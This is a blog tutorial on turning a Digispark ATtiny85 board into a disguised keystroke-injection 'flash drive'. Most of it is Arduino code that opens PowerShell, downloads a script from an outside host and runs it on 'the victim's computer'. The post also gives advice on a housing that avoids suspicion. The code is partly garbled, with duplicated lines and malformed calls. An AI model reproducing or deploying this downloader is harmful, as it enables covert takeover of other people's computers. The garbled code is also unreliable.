Programmable "flash drive" or how to quickly take over your computer

By | |

Today, the entry is a form of tutorial on how to create your own programmable usb stick along the lines of the expensive and popular Rubber Ducky from Hak5. It will work on the principle of a keyboard – connected to the computer enters a pre-programmed key sequence. The first step is to purchase a miniature Arduino board based on the ATtiny85 microcontroller – Digispark. The cheapest you can find it from our friends from China on one of the popular auction sites. Prices start there from as low as $1 –Digispark As sometimes there ATtiny85 - Digispark is a problem with the detection of DigiSpark by some computers (especially USB3 ports), it is best to immediately stock up on an adapter, which solves this problem (cost about 2$) –Adapter When the usb adapter ordered equipment reaches us we need to program its environment, which will be Adruino IDE –Arduino Tutorial connecting to it Digisparka we can find here –Scheme Our controller has a limited amount of memory, so the correct payload may not fit on it. I went around this problem by putting on it a code that downloads a script with payload using a powershell, which in turn will later be run on the victim's computer:

#include "DigiKeyboard.h" void setup() { }

void loop() { DigiKeyboard.sendKeyStroke(0); DigiKeyboard.delay(500); DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); DigiKeyboard.delay(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.KEY_ENTER); DigiKeyboard.delay(1000); DigiKeyboard.print("$client = new-object System.Net.WebClient"); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(500); DigiKeyboard.print("$client. DownloadFile("https://my127001.pl/script.ps1" , "script.ps1")"); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(2000); DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT | KEY_R); DigiKeyboard.delay(750); DigiKeyboard.print("powershell.exe -File script.ps1"); DigiKeyboard.sendKeyStroke(KEY_ENTER); for (;;) { /*empty*/ }

}

In order to further make the appearance of our pendriva more authoritful, so that it does not arouse suspicion, it is worth stocking up on a printed housing e.g. from the design underthe link – Housing The whole thing looks like this and can take control of the victim's computer in seconds: Programmable "flash drive"

Chcesz wiedzieć więcej?

Zapisz się i bądź informowany o nowych postach (zero spamu!). Dodatkowo otrzymasz, moją prywatną listę 15 najbardziej przydatnych narzędzi (wraz z krótkim opisem), których używam przy testach penetracyjnych.

Nigdy nie podam, nie wymienię ani nie sprzedam Twojego adresu e-mail. W każdej chwili możesz zrezygnować z subskrypcji.

Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *